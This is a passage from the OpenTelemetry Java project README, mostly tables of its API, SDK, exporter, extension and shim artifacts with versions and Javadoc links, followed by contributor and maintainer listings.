<!--VERSION_STABLE-->1.37.0<!--/VERSION_STABLE--> | N/A | | [Alpha Bill of Materials (BOM)](./bom-alpha) | Bill of materials for alpha artifacts | `opentelemetry-bom-alpha` | <!--VERSION_UNSTABLE-->1.37.0-alpha<!--/VERSION_UNSTABLE--> | N/A | ### API | Component | Description | Artifact ID | Version | Javadoc | |-----------------------------------|--------------------------------------------------------------------------------------|-------------------------------|---------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------| | [API](./api/all) | OpenTelemetry API, including metrics, traces, baggage, context | `opentelemetry-api` | <!--VERSION_STABLE-->1.37.0<!--/VERSION_STABLE--> | [![Javadocs](https://www.javadoc.io/badge/io.opentelemetry/opentelemetry-api.svg)](https://www.javadoc.io/doc/io.opentelemetry/opentelemetry-api) | | [API Incubator](./api/incubator) | API incubator, including pass through propagator, and extended tracer, and Event API | `opentelemetry-api-incubator` | <!--VERSION_STABLE-->1.37.0<!--/VERSION_STABLE--> | [![Javadocs](https://www.javadoc.io/badge/io.opentelemetry/opentelemetry-api-incubator.svg)](https://www.javadoc.io/doc/io.opentelemetry/opentelemetry-api-incubator) | | [Context API](./context) | OpenTelemetry context API | `opentelemetry-context` | <!--VERSION_STABLE-->1.37.0<!--/VERSION_STABLE--> | [![Javadocs](https://www.javadoc.io/badge/io.opentelemetry/opentelemetry-context.svg)](https://www.javadoc.io/doc/io.opentelemetry/opentelemetry-context) | ### API Extensions | Component | Description | Artifact ID | Version | Javadoc | |---------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|---------------------------------------------|-------------------------------------------------------------|---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| | [Kotlin Extension](./extensions/kotlin) | Context extension for coroutines | `opentelemetry-extension-kotlin` | <!--VERSION_STABLE-->1.37.0<!--/VERSION_STABLE--> | [![Javadocs](https://www.javadoc.io/badge/io.opentelemetry/opentelemetry-extension-kotlin.svg)](https://www.javadoc.io/doc/io.opentelemetry/opentelemetry-extension-kotlin) | | [Trace Propagators Extension](./extensions/trace-propagators) | Trace propagators, including B3, Jaeger, OT Trace | `opentelemetry-extension-trace-propagators` | <!--VERSION_STABLE-->1.37.0<!--/VERSION_STABLE--> | [![Javadocs](https://www.javadoc.io/badge/io.opentelemetry/opentelemetry-extension-trace-propagators.svg)](https://www.javadoc.io/doc/io.opentelemetry/opentelemetry-extension-trace-propagators) | ### SDK | Component | Description | Artifact ID | Version | Javadoc | |------------------------------|--------------------------------------------------------|-----------------------------|---------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------| | [SDK](./sdk/all) | OpenTelemetry SDK, including metrics, traces, and logs | `opentelemetry-sdk` | <!--VERSION_STABLE-->1.37.0<!--/VERSION_STABLE--> | [![Javadocs](https://www.javadoc.io/badge/io.opentelemetry/opentelemetry-sdk.svg)](https://www.javadoc.io/doc/io.opentelemetry/opentelemetry-sdk) | | [Metrics SDK](./sdk/metrics) | OpenTelemetry metrics SDK | `opentelemetry-sdk-metrics` | <!--VERSION_STABLE-->1.37.0<!--/VERSION_STABLE--> | [![Javadocs](https://www.javadoc.io/badge/io.opentelemetry/opentelemetry-sdk-metrics.svg)](https://www.javadoc.io/doc/io.opentelemetry/opentelemetry-sdk-metrics) | | [Trace SDK](./sdk/trace) | OpenTelemetry trace SDK | `opentelemetry-sdk-trace` | <!--VERSION_STABLE-->1.37.0<!--/VERSION_STABLE--> | [![Javadocs](https://www.javadoc.io/badge/io.opentelemetry/opentelemetry-sdk-trace.svg)](https://www.javadoc.io/doc/io.opentelemetry/opentelemetry-sdk-trace) | | [Log SDK](./sdk/logs) | OpenTelemetry log SDK | `opentelemetry-sdk-logs` | <!--VERSION_STABLE-->1.37.0<!--/VERSION_STABLE--> | [![Javadocs](https://www.javadoc.io/badge/io.opentelemetry/opentelemetry-sdk-logs.svg)](https://www.javadoc.io/doc/io.opentelemetry/opentelemetry-sdk-logs) | | [SDK Common](./sdk/common) | Shared SDK components | `opentelemetry-sdk-common` | <!--VERSION_STABLE-->1.37.0<!--/VERSION_STABLE--> | [![Javadocs](https://www.javadoc.io/badge/io.opentelemetry/opentelemetry-sdk-common.svg)](https://www.javadoc.io/doc/io.opentelemetry/opentelemetry-sdk-common) | | [SDK Testing](./sdk/testing) | Components for testing OpenTelemetry instrumentation | `opentelemetry-sdk-testing` | <!--VERSION_STABLE-->1.37.0<!--/VERSION_STABLE--> | [![Javadocs](https://www.javadoc.io/badge/io.opentelemetry/opentelemetry-sdk-testing.svg)](https://www.javadoc.io/doc/io.opentelemetry/opentelemetry-sdk-testing) | ### SDK Exporters | Component | Description | Artifact ID | Version | Javadoc | |-----------------------------------------------------------------------|------------------------------------------------------------------------------|-------------------------------------------------------------------------|-------------------------------------------------------------|---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| | [OTLP Exporters](./exporters/otlp/all) | OTLP gRPC & HTTP exporters, including traces, metrics, and logs | `opentelemetry-exporter-otlp` | <!--VERSION_STABLE-->1.37.0<!--/VERSION_STABLE--> | [![Javadocs](https://www.javadoc.io/badge/io.opentelemetry/opentelemetry-exporter-otlp.svg)](https://www.javadoc.io/doc/io.opentelemetry/opentelemetry-exporter-otlp) | | [OTLP Logging Exporters](./exporters/logging-otlp) | Logging exporters in OTLP JSON encoding, including traces, metrics, and logs | `opentelemetry-exporter-logging-otlp` | <!--VERSION_STABLE-->1.37.0<!--/VERSION_STABLE--> | [![Javadocs](https://www.javadoc.io/badge/io.opentelemetry/opentelemetry-exporter-logging-otlp.svg)](https://www.javadoc.io/doc/io.opentelemetry/opentelemetry-exporter-logging-otlp) | | [OTLP Common](./exporters/otlp/common) | Shared OTLP components (internal) | `opentelemetry-exporter-otlp-common` | <!--VERSION_STABLE-->1.37.0<!--/VERSION_STABLE--> | [![Javadocs](https://www.javadoc.io/badge/io.opentelemetry/opentelemetry-exporter-otlp-common.svg)](https://www.javadoc.io/doc/io.opentelemetry/opentelemetry-exporter-otlp-common) | | [Logging Exporter](./exporters/logging) | Logging exporters, including metrics, traces, and logs | `opentelemetry-exporter-logging` | <!--VERSION_STABLE-->1.37.0<!--/VERSION_STABLE--> | [![Javadocs](https://www.javadoc.io/badge/io.opentelemetry/opentelemetry-exporter-logging.svg)](https://www.javadoc.io/doc/io.opentelemetry/opentelemetry-exporter-logging) | | [Zipkin Exporter](./exporters/zipkin) | Zipkin trace exporter | `opentelemetry-exporter-zipkin` | <!--VERSION_STABLE-->1.37.0<!--/VERSION_STABLE--> | [![Javadocs](https://www.javadoc.io/badge/io.opentelemetry/opentelemetry-exporter-zipkin.svg)](https://www.javadoc.io/doc/io.opentelemetry/opentelemetry-exporter-zipkin) | | [Prometheus Exporter](./exporters/prometheus) | Prometheus metric exporter | `opentelemetry-exporter-prometheus` | <!--VERSION_UNSTABLE-->1.37.0-alpha<!--/VERSION_UNSTABLE--> | [![Javadocs](https://www.javadoc.io/badge/io.opentelemetry/opentelemetry-exporter-prometheus.svg)](https://www.javadoc.io/doc/io.opentelemetry/opentelemetry-exporter-prometheus) | | [Exporter Common](./exporters/common) | Shared exporter components (internal) | `opentelemetry-exporter-common` | <!--VERSION_STABLE-->1.37.0<!--/VERSION_STABLE--> | [![Javadocs](https://www.javadoc.io/badge/io.opentelemetry/opentelemetry-exporter-common.svg)](https://www.javadoc.io/doc/io.opentelemetry/opentelemetry-exporter-common) | | [OkHttp Sender](./exporters/sender/okhttp) | OkHttp implementation of HttpSender (internal) | `opentelemetry-exporter-sender-okhttp` | <!--VERSION_STABLE-->1.37.0<!--/VERSION_STABLE--> | [![Javadocs](https://www.javadoc.io/badge/io.opentelemetry/opentelemetry-exporter-sender-okhttp.svg)](https://www.javadoc.io/doc/io.opentelemetry/opentelemetry-exporter-sender-okhttp) | | [JDK Sender](./exporters/sender/okhttp) | Java 11+ native HttpClient implementation of HttpSender (internal) | `opentelemetry-exporter-sender-jdk` TODO: remove `-alpha` after release | <!--VERSION_UNSTABLE-->1.37.0-alpha<!--/VERSION_UNSTABLE--> | [![Javadocs](https://www.javadoc.io/badge/io.opentelemetry/opentelemetry-exporter-sender-jdk.svg)](https://www.javadoc.io/doc/io.opentelemetry/opentelemetry-exporter-sender-jdk) | | | [gRPC ManagedChannel Sender](./exporters/sender/grpc-managed-channel) | gRPC ManagedChannel implementation of GrpcSender (internal) | `opentelemetry-exporter-sender-grpc-managed-channel` | <!--VERSION_STABLE-->1.37.0<!--/VERSION_STABLE--> | [![Javadocs](https://www.javadoc.io/badge/io.opentelemetry/opentelemetry-exporter-sender-grpc-managed-channel.svg)](https://www.javadoc.io/doc/io.opentelemetry/opentelemetry-exporter-sender-grpc-managed-channel) | | ### SDK Extensions | Component | Description | Artifact ID | Version | Javadoc | |-------------------------------------------------------------------------------|------------------------------------------------------------------------------------|-----------------------------------------------------|-------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| | [SDK Autoconfigure](./sdk-extensions/autoconfigure) | Autoconfigure OpenTelemetry SDK from env vars, system properties, and SPI | `opentelemetry-sdk-extension-autoconfigure` | <!--VERSION_STABLE-->1.37.0<!--/VERSION_STABLE--> | [![Javadocs](https://www.javadoc.io/badge/io.opentelemetry/opentelemetry-sdk-extension-autoconfigure.svg)](https://www.javadoc.io/doc/io.opentelemetry/opentelemetry-sdk-extension-autoconfigure) | | [SDK Autoconfigure SPI](./sdk-extensions/autoconfigure-spi) | Service Provider Interface (SPI) definitions for autoconfigure | `opentelemetry-sdk-extension-autoconfigure-spi` | <!--VERSION_STABLE-->1.37.0<!--/VERSION_STABLE--> | [![Javadocs](https://www.javadoc.io/badge/io.opentelemetry/opentelemetry-sdk-extension-autoconfigure-spi.svg)](https://www.javadoc.io/doc/io.opentelemetry/opentelemetry-sdk-extension-autoconfigure-spi) | | [SDK Jaeger Remote Sampler Extension](./sdk-extensions/jaeger-remote-sampler) | Sampler which obtains sampling configuration from remote Jaeger server | `opentelemetry-sdk-extension-jaeger-remote-sampler` | <!--VERSION_STABLE-->1.37.0<!--/VERSION_STABLE--> | [![Javadocs](https://www.javadoc.io/badge/io.opentelemetry/opentelemetry-sdk-extension-jaeger-remote-sampler.svg)](https://www.javadoc.io/doc/io.opentelemetry/opentelemetry-sdk-extension-jaeger-remote-sampler) | | [SDK Incubator](./sdk-extensions/incubator) | SDK incubator, including YAML based view configuration, LeakDetectingSpanProcessor | `opentelemetry-sdk-extension-incubator` | <!--VERSION_UNSTABLE-->1.37.0-alpha<!--/VERSION_UNSTABLE--> | [![Javadocs](https://www.javadoc.io/badge/io.opentelemetry/opentelemetry-sdk-extension-incubator.svg)](https://www.javadoc.io/doc/io.opentelemetry/opentelemetry-sdk-extension-incubator) | ### Shims | Component | Description | Artifact ID | Version | Javadoc | |----------------------------------------|--------------------------------------------------------------|----------------------------------|-------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------| | [OpenCensus Shim](./opencensus-shim) | Bridge opencensus metrics into the OpenTelemetry metrics SDK | `opentelemetry-opencensus-shim` | <!--VERSION_UNSTABLE-->1.37.0-alpha<!--/VERSION_UNSTABLE--> | [![Javadocs](https://www.javadoc.io/badge/io.opentelemetry/opentelemetry-opencensus-shim.svg)](https://www.javadoc.io/doc/io.opentelemetry/opentelemetry-opencensus-shim) | | [OpenTracing Shim](./opentracing-shim) | Bridge opentracing spans into the OpenTelemetry trace API | `opentelemetry-opentracing-shim` | <!--VERSION_STABLE-->1.37.0<!--/VERSION_STABLE--> | [![Javadocs](https://www.javadoc.io/badge/io.opentelemetry/opentelemetry-opentracing-shim.svg)](https://www.javadoc.io/doc/io.opentelemetry/opentelemetry-opentracing-shim) | ## Contributing See [CONTRIBUTING.md](CONTRIBUTING.md) Triagers: - [Gregor Zeitlinger](https://github.com/zeitlinger), Grafana Labs *Find more about the triager role in [community repository](https://github.com/open-telemetry/community/blob/main/community-membership.md#triager).* Approvers ([@open-telemetry/java-approvers](https://github.com/orgs/open-telemetry/teams/java-approvers)): - [Jason Plumb](https://github.com/breedx-splk), Splunk - [Josh Suereth](https://github.com/jsuereth), Google - [Trask Stalnaker](https://github.com/trask), Microsoft *Find more about the approver role in [community repository](https://github.com/open-telemetry/community/blob/master/community-membership.md#approver).* Maintainers ([@open-telemetry/java-maintainers](https://github.com/orgs/open-telemetry/teams/java-maintainers)): - [Jack Berg](https://github.com/jack-berg), New Relic - [John Watson](https://github.com/jkwatson), Verta.ai Emeritus: - Maintainer [Bogdan Drutu](https://github.com/BogdanDrutu) - Maintainer [Carlos Alberto](https://github.com/carlosalberto) - Approver [Mateusz Rzeszutek](https://github.com/mateuszrzeszutek) *Find more about the maintainer role in [community repository](https://github.com/open-telemetry/community/blob/master/community-membership.md#maintainer).* ### Thanks to all the people who have contributed <a href="https://github.com/open-telemetry/opentelemetry-java/graphs/contributors"> <img src="https://contrib.rocks/image?repo=open-telemetry/opentelemetry-java" /> </a> Made with [contrib.rocks](https://contrib.rocks). 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